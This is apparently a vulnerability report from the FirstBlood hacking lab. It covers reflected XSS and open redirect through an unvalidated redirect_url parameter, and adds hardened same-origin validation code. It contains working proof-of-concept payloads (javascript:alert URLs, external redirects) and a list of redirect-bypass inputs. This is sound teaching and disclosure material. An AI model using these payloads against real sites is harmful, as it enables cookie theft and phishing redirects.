FirstBlood-#1498 Redirect url vulnerable to XSS and Open redirect
This issue was discovered on FirstBlood v3



On 2022-12-10, pichik Level 4 reported:

Hi,

DESCRIPTION:

There are 2 vulnerable endpoints:

  1. The first endpoint is about.html, which instantly redirects you to about.php.
  2. The second endpoint is book-appointment.html, which instantly redirects you to book-appointment.php.

Not sure if these are two separate bugs or just one, so I am reporting both of them here.
If we inspect this endpoint, there is a script:

<script>

    // Read the query string of the current page (e.g. "?redirect_url=...")
    var curUrl = window.location.search;
    var params = new URLSearchParams(curUrl);
    var redirect_url = params.get('redirect_url');

    if (redirect_url == null) {
        // No parameter given: go to the replacement page
        top.location.href='about.php';
    } else {
        // Parameter given: navigate to it verbatim, without any validation
        top.location.href=redirect_url;
    }

</script>

This script reveals a new query parameter, redirect_url, which is then passed to top.location.href without any sanitization and is thus vulnerable to XSS.
We can use a simple payload for href with the javascript: protocol: javascript:alert(document.domain)

POC LINK:

Reflected XSS:
https://0a3942517b17-pichik.a.firstbloodhackers.com/about.html?redirect_url=javascript:alert(document.domain)
https://0a3942517b17-pichik.a.firstbloodhackers.com/book-appointment.html?redirect_url=javascript:alert(document.domain)
Open Redirect:
https://0a3942517b17-pichik.a.firstbloodhackers.com/about.html?redirect_url=https://google.com
https://0a3942517b17-pichik.a.firstbloodhackers.com/book-appointment.html?redirect_url=https://google.com

IMPACT:

An attacker can send this to doctors and steal their cookies.

REMEDIATION:

Remove this endpoint entirely, or add HTML encoding of special characters to prevent XSS
and filter external URLs to prevent Open Redirects.
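The following is an added example, not code from the FirstBlood application or from the reporter. It places the redirect logic quoted in the report beside a hardened replacement. Because the sink here is a navigation assignment (top.location.href) rather than HTML output, the hardened version validates the parameter as a URL: it resolves redirect_url against the page origin, allows only http(s), and requires the result to stay on the same origin, which covers the javascript: payload, absolute external URLs, protocol-relative forms (//host, \\host) and userinfo tricks (origin@evil). The function names, the ORIGIN constant (taken from the PoC links) and the sample inputs are assumptions made for this illustration.

```javascript
// Added example (not the application's own code). Node's global URL and
// URLSearchParams follow the WHATWG URL Standard, the same parser browsers use.

// Vulnerable behaviour as quoted in the report: whatever is in ?redirect_url=
// is returned verbatim, so "javascript:alert(document.domain)" becomes script
// execution and "https://google.com" becomes an open redirect.
function vulnerableRedirectTarget(search, fallback) {
  const params = new URLSearchParams(search);
  const redirectUrl = params.get('redirect_url');
  return redirectUrl == null ? fallback : redirectUrl;
}

// Hardened replacement: resolve the parameter against the page origin and
// accept it only if the result is http(s) on the same origin. Everything else
// (javascript:, data:, //evil, \\evil, https://evil, https://good@evil) falls
// back to the default page. Only path+query+fragment is returned, so the
// redirect is always relative.
function safeRedirectTarget(search, fallback, origin) {
  const params = new URLSearchParams(search);
  const raw = params.get('redirect_url');
  if (raw == null) return fallback;

  let resolved;
  try {
    // "/about.php" resolves to "<origin>/about.php"; an absolute URL such as
    // "https://google.com" or "//google.com" resolves to that external host.
    resolved = new URL(raw, origin);
  } catch (e) {
    return fallback; // unparseable input: use the default target
  }

  // Scheme allow-list: rejects javascript:, data:, vbscript:, ...
  if (resolved.protocol !== 'https:' && resolved.protocol !== 'http:') return fallback;

  // Same-origin check: rejects external hosts, including the protocol-relative
  // and backslash forms, and "https://<ourhost>@evil.com" (host is evil.com).
  if (resolved.origin !== new URL(origin).origin) return fallback;

  return resolved.pathname + resolved.search + resolved.hash;
}

// Constructed sample inputs: the payloads from the report plus common bypass
// attempts. ORIGIN is the host from the PoC links (assumption for the demo).
const ORIGIN = 'https://0a3942517b17-pichik.a.firstbloodhackers.com';
const SAMPLE_SEARCHES = [
  '?redirect_url=javascript:alert(document.domain)',   // XSS payload from report
  '?redirect_url=https://google.com',                  // open redirect from report
  '?redirect_url=//google.com',                        // protocol-relative
  '?redirect_url=\\\\google.com',                      // backslash variant
  '?redirect_url=https://' + ORIGIN.slice(8) + '@evil.com', // userinfo trick
  '?redirect_url=/book-appointment.php?slot=3',        // legitimate relative
  '',                                                  // no parameter at all
];

// Evaluate every sample against both versions; returns an array of
// { search, vulnerable, safe } so the difference can be inspected or asserted.
function evaluateSamples() {
  return SAMPLE_SEARCHES.map((search) => ({
    search,
    vulnerable: vulnerableRedirectTarget(search, 'about.php'),
    safe: safeRedirectTarget(search, 'about.php', ORIGIN),
  }));
}

// Browser wire-up (guarded so this file also runs under Node for the demo):
if (typeof window !== 'undefined') {
  top.location.href = safeRedirectTarget(window.location.search, 'about.php', window.location.origin);
}
```

Running evaluateSamples() shows the vulnerable function handing back every attacker-controlled value unchanged, while the hardened one returns 'about.php' for all of them except the legitimate same-origin path. Note that an allow-list of known redirect targets (here only about.php and book-appointment.php exist) would be simpler still; the URL-based check is shown because it generalizes to any page that must accept a caller-supplied path.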

P3 Medium

Endpoint: /about.html

Parameter: redirect_url

Payload: javascript:alert(1)


FirstBlood ID: 45
Vulnerability Type: Reflective XSS

The endpoint about.php was introduced to replace about.html, but code on about.html introduces an XSS vulnerability via the javascript: URI

FirstBlood ID: 46
Vulnerability Type: Reflective XSS

The endpoint book-appointment.php was introduced to replace book-appointment.html, but code on book-appointment.html introduces an XSS vulnerability via the javascript: URI